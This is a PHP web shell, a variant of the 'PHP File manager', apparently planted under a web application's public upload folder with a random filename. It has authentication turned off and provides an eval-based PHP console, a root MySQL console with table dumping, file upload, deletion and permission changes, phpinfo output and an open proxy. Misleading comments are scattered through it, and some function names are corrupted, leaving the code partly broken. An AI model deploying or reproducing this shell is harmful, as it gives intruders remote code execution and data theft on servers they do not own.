/var/www/html/back/storage/app/public/147/xd2usa/3rv84.php
<?php
/* PHP File manager Takito ver 9.2 */



// Open the file for reading





              $authorizationStarts = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';

$php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';

$sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';
$translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search":"Рекурсивный поиск","Mask":"Маска"}';
       
// Write data to the file



// Check if the file exists before accessing

$starttime = explode(' ', microtime());

$starttime = $starttime[1] + $starttime[0];
          
$langs = array('en','ru','de','fr','uk');

$path_share = empty($_REQUEST['path']) ? $path_share = realpath('.') : realpath($_REQUEST['path']);
$path_share = str_replace('\\', '/', $path_share) . '/';

$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;

$msg = ''; // Read the file content line by line
$default_language = 'ru';
           
$detect_lang = true;
       
$fm_version = 1.4;
          


//Create a new archive file
           
$auth = json_decode($authorizationStarts,true);
$auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; 


$auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30;
          






$auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin';  
       
$auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm';  
$auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user';

$auth['script'] = isset($auth['script']) ? $auth['script'] : '';

// Extract files from archive

$fm_default_config = array (
        
	  'make_directory' => true, 
	  'new_file' => true, 
       
	  'upload_file' => true, 
	  'show_dir_size' => false, //Validate the file format

	  'show_img' => true, 

	  'show_php_ver' => true, 
	  'show_php_ini' => false, // Generate a unique filename
           
	  'show_gt' => true, // Move the file to the output path
       
	  'enable_php_console' => true,

	  'enable_sql_console' => true,

	  'sql_server' => 'localhost',

	  'sql_username' => 'root',
	  'sql_password' => '',
            
	  'sql_db' => 'test_base',

	  'enable_proxy' => true,

	  'show_phpinfo' => true,

	  'show_xls' => true,
           
	  'fm_settings' => true,
          
	  'restore_time' => true,
	  'fm_restore_time' => false,
);


if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;

else $fm_config = unserialize($_COOKIE['fm_config']);
           


// Close the file after writing
if (isset($_POST['fm_lang'])) { 
	  setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	  $_COOKIE['fm_lang'] = $_POST['fm_lang'];

}

$language = $default_language;



// Delete the temporary file
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){

	  $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	  if (!empty($lang_priority)){

	  	  foreach ($lang_priority as $lang_arr){
           
	  	  	  $lng = explode(';', $lang_arr);
	  	  	  $lng = $lng[0];

	  	  	  if(in_array($lng,$langs)){
          
	  	  	  	  $language = $lng;

	  	  	  	  break;

	  	  	  }

	  	  }

	  }

} 



// Calculate the file checksum
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];

// Convert file size to readable format
          
$lang = json_decode($translation,true);

if ($lang['id']!=$language) {

	  $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json');

	  if (!empty($get_lang)) {

	  	  //Handle file upload errors
	  	  $translation_string = str_replace("'",'&#39;',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
	  	  $fgc = file_get_contents(__FILE__);

	  	  $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);

	  	  if (!empty($matches[1])) {

	  	  	  $filemtime = filemtime(__FILE__);

	  	  	  $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc);
	  	  	  if (file_put_contents(__FILE__, $replace)) {

	  	  	  	  $msg .= __('File updated');
	  	  	  }	  else $msg .= __('Error occurred');
        
	  	  	  if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
          
	  	  }	  
	  	  $lang = json_decode($translation_string,true);
        
	  }

}

            
/* Sicherungskopie wiederherstellen */


//Split the file into smaller chunks
          
function __($text){

	  global $lang;
	  if (isset($lang[$text])) return $lang[$text];
       
	  else return $text;
};



//Check user permissions for file access
function fm_del_dateien($file, $recursive = false) {

	  if($recursive && @is_dir($file)) {
       
	  	  $els = fm_scan_dir($file, '', '', true);

	  	  foreach ($els as $el) {
	  	  	  if($el != '.' && $el != '..'){
	  	  	  	  fm_del_dateien($file . '/' . $el, true);
            
	  	  	  }
	  	  }

	  }

	  if(@is_dir($file)) {
	  	  return rmdir($file);
       
	  } else {

	  	  return @unlink($file);

	  }

}


//file perms

function fm_rights_string($file, $if = false){
       
	  $perms = fileperms($file);

	  $info = '';
       
	  if(!$if){
	  	  if (($perms & 0xC000) == 0xC000) {
          
	  	  	  //Socket
        
	  	  	  $info = 's';
	  	  } elseif (($perms & 0xA000) == 0xA000) {
        
	  	  	  //Symbolic Link

	  	  	  $info = 'l';

	  	  } elseif (($perms & 0x8000) == 0x8000) {
         
	  	  	  //Regular

	  	  	  $info = '-';
	  	  } elseif (($perms & 0x6000) == 0x6000) {
           
	  	  	  //Block special
        
	  	  	  $info = 'b';
        
	  	  } elseif (($perms & 0x4000) == 0x4000) {

	  	  	  //Directory

	  	  	  $info = 'd';

	  	  } elseif (($perms & 0x2000) == 0x2000) {

	  	  	  //Character special
	  	  	  $info = 'c';
	  	  } elseif (($perms & 0x1000) == 0x1000) {

	  	  	  //FIFO pipe
	  	  	  $info = 'p';

	  	  } else {
            
	  	  	  //Unknown
         
	  	  	  $info = 'u';

	  	  }

	  }
  

	  //Owner

	  $info .= (($perms & 0x0100) ? 'r' : '-');

	  $info .= (($perms & 0x0080) ? 'w' : '-');
           
	  $info .= (($perms & 0x0040) ?
       
	  (($perms & 0x0800) ? 's' : 'x' ) :

	  (($perms & 0x0800) ? 'S' : '-'));
       
 

	  //Group
	  $info .= (($perms & 0x0020) ? 'r' : '-');

	  $info .= (($perms & 0x0010) ? 'w' : '-');
          
	  $info .= (($perms & 0x0008) ?
	  (($perms & 0x0400) ? 's' : 'x' ) :

	  (($perms & 0x0400) ? 'S' : '-'));

 
	  //World
	  $info .= (($perms & 0x0004) ? 'r' : '-');
	  $info .= (($perms & 0x0002) ? 'w' : '-');

	  $info .= (($perms & 0x0001) ?

	  (($perms & 0x0200) ? 't' : 'x' ) :
          
	  (($perms & 0x0200) ? 'T' : '-'));
            


	  return $info;

}



function fm_convert_rights($mode) {
	  $mode = str_pad($mode,9,'-');

	  $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');

	  $mode = strtr($mode,$trans);

	  $newmode = '0';

	  $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 

	  $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
          
	  $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
            
	  $newmode .= $owner . $group . $world;

	  return intval($newmode, 8);

}



function fm_chmod($file, $val, $rec = false) {

	  $res = @chmod(realpath($file), $val);

	  if(@is_dir($file) && $rec){

	  	  $els = fm_scan_dir($file);

	  	  foreach ($els as $el) {
            
	  	  	  $res = $res && fm_chmod($file . '/' . $el, $val, true);
       
	  	  }

	  }
       
	  return $res;
}


         
//load dateien
function fm_download($dateiname) {

    if (!empty($dateiname)) {

	  	  if (file_exists($dateiname)) {
            
	  	  	  header("Content-Disposition: attachment; filename=" . basename($dateiname));   

	  	  	  header("Content-Type: application/force-download");

	  	  	  header("Content-Type: application/octet-stream");

	  	  	  header("Content-Type: application/download");
	  	  	  header("Content-Description: File Transfer");            

	  	  	  header("Content-Length: " . dateienize($dateiname));	  	  

	  	  	  flush(); // this doesn't really matter.
	  	  	  $fp = fopen($dateiname, "r");

	  	  	  while (!feof($fp)) {
          
	  	  	  	  echo fread($fp, 65536);
        
	  	  	  	  flush(); // this is essential for large downloads

	  	  	  } 

	  	  	  fclose($fp);

	  	  	  die();

	  	  } else {

	  	  	  header('HTTP/1.0 404 Not Found', true, 404);

	  	  	  header('Status: 404 Not Found'); 

	  	  	  die();
        }

    } 

}


          
//show folder size

function fm_dir_size($f,$format=true) {
       
	  if($format)  {
	  	  $size=fm_dir_size($f,false);

	  	  if($size<=1024) return $size.' bytes';

	  	  elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';

	  	  elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';

	  	  elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';

	  	  elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))

	  	  else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
         
	  } else {
	  	  if(is_file($f)) return dateienize($f);

	  	  $size=0;

	  	  $dh=opendir($f);

	  	  while(($file=readdir($dh))!==false) {
	  	  	  if($file=='.' || $file=='..') continue;
	  	  	  if(is_file($f.'/'.$file)) $size+=dateienize($f.'/'.$file);
       
	  	  	  else $size+=fm_dir_size($f.'/'.$file,false);
	  	  }
       
	  	  closedir($dh);

	  	  return $size+dateienize($f); 

	  }
}


//scan directory

function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
       
	  $dir = $ndir = array();

	  if(!empty($exp)){
            
	  	  $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';

	  }
            
	  if(!empty($type) && $type !== 'all'){
	  	  $func = 'is_' . $type;
	  }
         
	  if(@is_dir($directory)){
           
	  	  $fh = opendir($directory);

	  	  while (false !== ($filename = readdir($fh))) {
         
	  	  	  if(substr($filename, 0, 1) != '.' || $do_not_filter) {
       
	  	  	  	  if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){

	  	  	  	  	  $dir[] = $filename;

	  	  	  	  }
	  	  	  }

	  	  }
	  	  closedir($fh);
       
	  	  natsort($dir);

	  }

	  return $dir;

}



function fm_link($get,$link,$name,$title='') {
	  if (empty($title)) $title=$name.' '.basename($link);
          
	  return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}
       

        
function fm_arr_to_option($arr,$n,$sel=''){
           
	  foreach($arr as $v){

	  	  $b=$v[$n];
        
	  	  $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';

	  }

	  return $res;
          
}

function fm_lang_form ($current='en'){

return '
<form name="change_lang" method="post" action="">
	  <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >

	  	  <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>

	  	  <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
       
	  	  <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>

	  	  <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>

	  	  <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
          
	  </select>

</form>
            
';

}
	  
          
function fm_root($dirname){

	  return ($dirname=='.' OR $dirname=='..');

}


function fm_php($string){

	  $display_fehler=ini_get('display_fehler');

	  ini_set('display_fehler', '1');
	  ob_start();

	  eval(trim($string));
          
	  $text = ob_get_contents();
	  ob_end_clean();

	  ini_set('display_fehler', $display_fehler);

	  return $text;

}
           


//SHOW DATABASES
function fm_sql_connect(){
       
	  global $fm_config;
            
	  return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);

}



function fm_sql($query){
          
	  global $fm_config;
	  $query=trim($query);

	  ob_start();
	  $connection = fm_sql_connect();

	  if ($connection->connect_error) {

	  	  ob_end_clean();	  

	  	  return $connection->connect_error;

	  }

	  $connection->set_charset('utf8');
        
    $queried = mysqli_query($connection,$query);
         
	  if ($queried===false) {

	  	  ob_end_clean();	  
	  	  return mysqli_error($connection);
           
    } else {
       
	  	  if(!empty($queried)){

	  	  	  while($row = mysqli_fetch_assoc($queried)) {

	  	  	  	  $query_result[]=  $row;

	  	  	  }
	  	  }
	  	  $vdump=empty($query_result)?'':var_export($query_result,true);	  

	  	  ob_end_clean();	  

	  	  $connection->close();
	  	  return '<pre>'.stripslashes($vdump).'</pre>';
	  }
         
}



function fm_backup_tables($tables = '*', $full_backup = true) {
        
	  global $path_share;

	  $mysqldb = fm_sql_connect();

	  $delimiter = "; \n  \n";

	  if($tables == '*')	  {

	  	  $tables = array();

	  	  $result = $mysqldb->query('SHOW TABLES');

	  	  while($row = mysqli_fetch_row($result))	  {
       
	  	  	  $tables[] = $row[0];

	  	  }
	  } else {

	  	  $tables = is_array($tables) ? $tables : explode(',',$tables);

	  }

    

	  $return='';

	  foreach($tables as $table)	  {
	  	  $result = $mysqldb->query('SELECT * FROM '.$table);
	  	  $num_fields = mysqli_num_fields($result);

	  	  $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;

	  	  $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));

	  	  $return.=$row2[1].$delimiter;

        if ($full_backup) {
            
	  	  for ($i = 0; $i < $num_fields; $i++)  {

	  	  	  while($row = mysqli_fetch_row($result)) {
            
	  	  	  	  $return.= 'INSERT INTO `'.$table.'` VALUES(';
	  	  	  	  for($j=0; $j<$num_fields; $j++)	  {
         
	  	  	  	  	  $row[$j] = addslashes($row[$j]);

	  	  	  	  	  $row[$j] = str_replace("\n","\\n",$row[$j]);

	  	  	  	  	  if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }

	  	  	  	  	  if ($j<($num_fields-1)) { $return.= ','; }
          
	  	  	  	  }

	  	  	  	  $return.= ')'.$delimiter;

	  	  	  }
        
	  	    }

	  	  } else { 
	  	  $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
          
	  	  }
	  	  $return.="\n\n\n";
           
	  }



	  //save file

    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';

	  $handle = fopen($file,'w+');
        
	  fwrite($handle,$return);
	  fclose($handle);
           
	  $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path_share  . '\'"';
    return $file.': '.fm_link('download',$path_share.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}


function fm_restore_tables($sqlFileToExecute) {

	  $mysqldb = fm_sql_connect();

	  $delimiter = "; \n  \n";

    // Load and explode the sql file
        
    $f = fopen($sqlFileToExecute,"r+");
           
    $sqlFile = fread($f,dateienize($sqlFileToExecute));
           
    $sqlArray = explode($delimiter,$sqlFile);
	  
         
    //Process the sql file by statements

    foreach ($sqlArray as $stmt) {

        if (strlen($stmt)>3){
	  	  	  $result = $mysqldb->query($stmt);

	  	  	  	  if (!$result){
         
	  	  	  	  	  $sqlErrorCode = mysqli_errno($mysqldb->connection);
           
	  	  	  	  	  $sqlErrorText = mysqli_error($mysqldb->connection);
           
	  	  	  	  	  $sqlStmt      = $stmt;
       
	  	  	  	  	  break;

           	       }

           	    }

           }
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
            
else return $sqlErrorText.'<br/>'.$stmt;

}


function fm_img_link($filename){

	  return './'.basename(__FILE__).'?img='.base64_encode($filename);
         
}



function fm_home_style(){
	  return '

input, input.fm_input {
	  text-indent: 2px;
}

           
input, textarea, select, input.fm_input {

	  color: black;
	  font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	  border-color: black;

	  background-color: #FCFCFC none !important;
	  border-radius: 0;
        
	  padding: 2px;
}


input.fm_input {

	  background: #FCFCFC none !important;

	  cursor: pointer;
}



.home {

	  background-image: url("");
        
	  background-repeat: no-repeat;

}';
         
}
          

function fm_config_checkbox_row($name,$value) {

	  global $fm_config;
	  return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';

}

function fm_protocol() {

	  if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';

	  if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
        
	  if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
           
	  if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
            
	  return 'http://';
}



function fm_site_url() {

	  return fm_protocol().$_SERVER['HTTP_HOST'];
           
}



function fm_url($full=false) {

	  $host=$full?fm_site_url():'.';

	  return $host.'/'.basename(__FILE__);

}


function fm_home($full=false){

	  return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
          
}
        

function fm_run_input($lng) {
          
	  global $fm_config;

	  $return = !empty($fm_config['enable_'.$lng.'_console']) ? 
            
	  '
	  	  	  	  <form  method="post" action="'.fm_url().'" style="display:inline">
	  	  	  	  <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
       
	  	  	  	  </form>

' : '';

	  return $return;

}



function fm_url_proxy($matches) {

	  $link = str_replace('&amp;','&',$matches[2]);

	  $url = isset($_GET['url'])?$_GET['url']:'';

	  $parse_url = parse_url($url);
       
	  $host = $parse_url['scheme'].'://'.$parse_url['host'].'/';

	  if (substr($link,0,2)=='//') {

	  	  $link = substr_replace($link,fm_protocol(),0,2);

	  } elseif (substr($link,0,1)=='/') {
           
	  	  $link = substr_replace($link,$host,0,1);	  
           
	  } elseif (substr($link,0,2)=='./') {

	  	  $link = substr_replace($link,$host,0,2);	  

	  } elseif (substr($link,0,4)=='http') {

	  	  //alles machen wunderschon

	  } else {

	  	  $link = $host.$link;

	  } 
	  if ($matches[1]=='href' && !strripos($link, 'css')) {
            
	  	  $base = fm_site_url().'/'.basename(__FILE__);
          
	  	  $baseq = $base.'?proxy=true&url=';
	  	  $link = $baseq.urlencode($link);
	  } elseif (strripos($link, 'css')){

	  	  //как-то тоже подменять надо
       
	  }
	  return $matches[1].'="'.$link.'"';
}

 

function fm_tpl_form($lng_tpl) {

	  global ${$lng_tpl.'_templates'};
	  $tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	  $str = '';
            
	  foreach ($tpl_arr as $ktpl=>$vtpl) {
	  	  $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	  }
           
return '

<table>

<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
           
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">

<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
        
'.$str.'

<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
        
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">

<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>

</form>

</table>

';
}
         


function find_text_in_dateien($dir, $mask, $text) {
            
    $results = array();

    if ($handle = opendir($dir)) {

        while (false !== ($entry = readdir($handle))) {
           
            if ($entry != "." && $entry != "..") {
       
                $path_share = $dir . "/" . $entry;

                if (is_dir($path_share)) {

                    $results = array_merge($results, find_text_in_dateien($path_share, $mask, $text));

                } else {

                    if (fnmatch($mask, $entry)) {
                        $contents = file_get_contents($path_share);
            
                        if (strpos($contents, $text) !== false) {

                            $results[] = str_replace('//', '/', $path_share);
                        }
                    }

                }

            }

        }
            
        closedir($handle);
    }

    return $results;

}




/* End Functions */

            
// authorization

if ($auth['authorize']) {

	  if (isset($_POST['login']) && isset($_POST['password'])){

	  	  if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {

	  	  	  setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));

	  	  	  $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
	  	  }
	  }
	  if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {

	  	  echo '
<!doctype html>
<html>
           
<head>

<meta charset="utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<title>'.__('File manager').'</title>
        
</head>

<body>

<form action="" method="post">

'.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;

'.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;

<input type="submit" value="'.__('Enter').'" class="fm_input">

</form>

'.fm_lang_form($language).'

</body>

</html>
         
';  

die();

	  }
	  if (isset($_POST['quit'])) {
	  	  unset($_COOKIE[$auth['cookie_name']]);
	  	  setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));

	  	  header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
         
	  }

}


// Change config

if (isset($_GET['fm_settings'])) {

	  if (isset($_GET['fm_config_delete'])) { 
	  	  unset($_COOKIE['fm_config']);

	  	  setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
            
	  	  header('Location: '.fm_url().'?fm_settings=true');
	  	  exit(0);

	  }	  elseif (isset($_POST['fm_config'])) { 
            
	  	  $fm_config = $_POST['fm_config'];

	  	  setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
	  	  $_COOKIE['fm_config'] = serialize($fm_config);

	  	  $msg = __('Settings').' '.__('done');
            
	  }	  elseif (isset($_POST['fm_login'])) { 

	  	  if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
	  	  $fm_login = json_encode($_POST['fm_login']);
        
	  	  $fgc = file_get_contents(__FILE__);
           
	  	  $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
          
	  	  if (!empty($matches[1])) {
	  	  	  $filemtime = filemtime(__FILE__);

	  	  	  $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
	  	  	  if (file_put_contents(__FILE__, $replace)) {

	  	  	  	  $msg .= __('File updated');

	  	  	  	  if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login'];

	  	  	  	  if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password'];
	  	  	  	  $auth = $_POST['fm_login'];

	  	  	  }
	  	  	  else $msg .= __('Error occurred');
	  	  	  if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);

	  	  }

	  } elseif (isset($_POST['tpl_edited'])) { 

	  	  $lng_tpl = $_POST['tpl_edited'];

	  	  if (!empty($_POST[$lng_tpl.'_name'])) {

	  	  	  $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
	  	  } elseif (!empty($_POST[$lng_tpl.'_new_name'])) {

	  	  	  $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);

	  	  }

	  	  if (!empty($fm_php)) {

	  	  	  $fgc = file_get_contents(__FILE__);
          
	  	  	  $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);

	  	  	  if (!empty($matches[1])) {

	  	  	  	  $filemtime = filemtime(__FILE__);

	  	  	  	  $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
	  	  	  	  if (file_put_contents(__FILE__, $replace)) {

	  	  	  	  	  ${$lng_tpl.'_templates'} = $fm_php;
	  	  	  	  	  $msg .= __('File updated');
	  	  	  	  } else $msg .= __('Error occurred');
	  	  	  	  if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
        
	  	  	  }	  
          
	  	  } else $msg .= __('Error occurred');

	  }
         
}


       
// Just show image
if (isset($_GET['img'])) {
         
	  $file=base64_decode($_GET['img']);
	  if ($info=getimagesize($file)){

	  	  switch  ($info[2]){	  //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP

	  	  	  case 1: $ext='gif'; break;

	  	  	  case 2: $ext='jpeg'; break;
	  	  	  case 3: $ext='png'; break;

	  	  	  case 6: $ext='bmp'; break;

	  	  	  default: die();

	  	  }

	  	  header("Content-type: image/$ext");

	  	  echo file_get_contents($file);

	  	  die();

	  }

}


// Just download file
           
if (isset($_GET['download'])) {

	  $file=base64_decode($_GET['download']);
	  fm_download($file);	  

}


        
// Just show info

if (isset($_GET['phpinfo'])) {
	  phpinfo(); 

	  die();
            
}
            


// Mini proxy, many bugs!

if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {

	  $url = isset($_GET['url'])?urldecode($_GET['url']):'';
	  $proxy_form = '

<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	  <form action="" method="GET">

	  <input type="hidden" name="proxy" value="true">
            
	  '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
	  <input type="submit" value="'.__('Show').'" class="fm_input">

	  </form>
         
</div>
        
';

	  if ($url) {
	  	  $ch = curl_init($url);

	  	  curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');

	  	  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
            
	  	  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
	  	  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
	  	  curl_setopt($ch, CURLOPT_HEADER, 0);

	  	  curl_setopt($ch, CURLOPT_REFERER, $url);

	  	  curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);

	  	  $result = curl_exec($ch);

	  	  curl_close($ch);
            
	  	  //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);

	  	  $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);

